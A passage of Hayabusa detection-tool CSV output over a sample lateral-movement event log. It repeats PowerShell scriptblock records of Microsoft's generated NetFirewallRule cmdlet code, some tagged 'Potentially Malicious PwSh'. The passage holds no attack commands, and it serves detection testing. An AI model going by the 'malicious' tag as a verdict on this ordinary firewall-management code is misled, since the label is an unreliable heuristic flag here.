($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdl",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"er.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdl",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"etization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' -Alias '*' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAp",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"etization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' -Alias '*' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 